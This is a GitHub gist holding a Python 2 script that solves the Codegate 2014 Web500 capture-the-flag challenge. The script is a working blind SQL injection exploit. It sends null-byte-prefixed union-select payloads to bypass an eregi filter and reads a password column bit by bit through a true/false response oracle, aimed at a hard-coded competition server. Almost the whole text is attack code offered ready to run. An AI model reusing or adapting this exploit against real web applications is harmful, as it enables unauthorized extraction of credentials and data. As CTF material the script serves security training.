Skip to content

Instantly share code, notes, and snippets.

@xelenonz
Last active August 29, 2015 13:56
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save xelenonz/99c0a394be62a3b70d92 to your computer and use it in GitHub Desktop.
Save xelenonz/99c0a394be62a3b70d92 to your computer and use it in GitHub Desktop.
Codegate 2014 (Web500) - Blind SQLi with bit shifting + bypass eregi
import urllib,urllib2
def find_length(cmd):
result = ""
for bit in range(7,-1,-1):
payload = "1\x00') union select (IF( (select (length((%s))>>%d)&1 ), '%s', 'wrong')),2#"%(cmd,bit,ip)
param = urllib.urlencode({"password":payload})
data = urllib.urlopen(site,param).read()
if "True" in data:
result += "1"
else:
result += "0"
return int(result,2)
def find_char(cmd,position):
result = ""
for bit in range(7,-1,-1):
payload = "1\x00') union select (IF((ascii(substr((%s),%d,1))>>%d)&1, '%s', 'wrong')),2#"%(cmd,position,bit,ip)
param = urllib.urlencode({"password":payload})
data = urllib.urlopen(site,param).read()
if "True" in data:
result += "1"
else:
result += "0"
return chr(int(result,2))
ip = urllib2.urlopen('http://ip.42.pl/raw').read()
site = "http://58.229.183.24/5a520b6b783866fd93f9dcdaf753af08/"
cmd = "select password from rms_120_pw where ip = 'my other IP'"
result = ""
result_length = int(find_length(cmd))
print result_length
for position in range(1,result_length+1):
result += find_char(cmd, position)
print result
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment